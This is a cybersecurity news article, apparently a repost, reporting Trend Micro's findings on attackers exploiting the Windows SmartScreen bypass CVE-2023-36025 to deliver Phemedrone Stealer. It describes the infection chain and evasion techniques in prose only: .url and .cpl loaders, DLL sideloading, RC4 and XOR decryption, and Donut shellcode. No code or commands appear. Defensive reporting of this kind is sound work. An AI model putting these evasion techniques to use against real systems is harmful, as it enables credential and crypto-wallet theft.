Sunday, March 3, 2024

Hackers Exploiting Windows Defender SmartScreen Flaw to Hijack Computers

Hackers actively target and exploit Windows Defender SmartScreen to deceive users and deliver malicious content by creating convincing, misleading websites or applications. 

By evading SmartScreen, the threat actors increase the chances of their malicious content being executed on users’ systems to compromise security. 

This exploitation often involves the use of social engineering tactics to deceive users and bypass the protective features of SmartScreen.

Recently, cybersecurity researchers at Trend Micro discovered that hackers are actively exploiting the Windows Defender SmartScreen flaw, which is tracked as “CVE-2023-36025,” to hijack Windows machines.

Flaw profile

CVE ID: CVE-2023-36025

Description: Windows SmartScreen Security Feature Bypass Vulnerability

Released: Nov 14, 2023

Last updated: Nov 22, 2023

CVSS:3.1 8.8 / 8.2

Hackers Exploiting Windows Defender SmartScreen

CVE-2023-36025 in Microsoft Windows Defender SmartScreen allows threat actors to exploit .url files that help in evading security checks. 

The demo codes on social media revealed their use in malware campaigns, including one with a Phemedrone Stealer payload.


Free Webinar

Fastrack Compliance: The Path to ZERO-Vulnerability

Compounding the problem are zero-day vulnerabilities like the MOVEit SQLi, Zimbra XSS, and 300+ such vulnerabilities that get discovered each month. Delays in fixing these vulnerabilities lead to compliance issues, these delay can be minimized with a unique feature on AppTrana that helps you to get “Zero vulnerability report” within 72 hours.

To initiate Phemedrone Stealer, threat actors place malicious Internet Shortcut files on Discord or cloud services that are often disguised with URL shorteners. 

Exploiting CVE-2023-36025 makes the users unknowingly open crafted .url files, which help in evading Windows Defender SmartScreen. Executing the file connects to the attacker’s server, downloading and executing a control panel item (.cpl) using a Windows shortcut to bypass SmartScreen. 

Infection chain (Source – Trend Micro)

Leveraging MITRE ATT&CK T1218.002 the hackers use the Windows Control Panel process to execute a malicious DLL that acts as a loader. The DLL calls on PowerShell to download and execute the next stage from GitHub by featuring an obfuscated loader named “DATA3.txt.” 

Besides this, researchers discovered that the PowerShell commands led to the download of a ZIP file from GitHub containing three files.

Here below we have mentioned those three files:-




The wer.dll file decrypts the second stage loader for persistence by creating scheduled tasks. Techniques like API hashing, string encryption, and VMProtect enhance the evasion mechanism. 

The loader sideloads using DLL spoofing which is executed by WerFaultSecure.exe that triggers the WerpSetExitListeners in wer.dll. 

Dynamic API resolves the hidden imports using CRC-32 hashing. XOR-based algorithms with dynamic key generation complicate string decryption. The second stage comes loaded in secure.pdf, decrypted using SystemFunction032 for RC4 decryption. 

AllocADsMem and ReallocADsMem allocate memory, and VirtualProtect modifies it to Executable-Read-Write. API callback functions redirect execution flow to the second stage by utilizing the CryptCATCDFOpen with the second stage’s Entry Point.

The attacker deployed the Donut second-stage loader, an open-source shellcode enabling the execution of various file types in memory.

Applications & Services Targeted

Here below, we have mentioned all the applications and services that are targeted by the malware:-

Chromium-based browsers

Crypto wallets





System Information



Despite CVE-2023-36025 patches the threat actors exploit it to bypass the Windows Defender SmartScreen with malware like “Phemedrone Stealer.” 

This case represents the connection between open-source malware and public exploits, highlighting the need for timely software updates and implementations of robust security solutions.

Looking for cost-effective penetration testing services? Try Kelltron’s to assess and evaluate the security posture of digital systems – Free Demo.

The post Hackers Exploiting Windows Defender SmartScreen Flaw to Hijack Computers appeared first on Cyber Security News.

   Read More 

Cyber Security News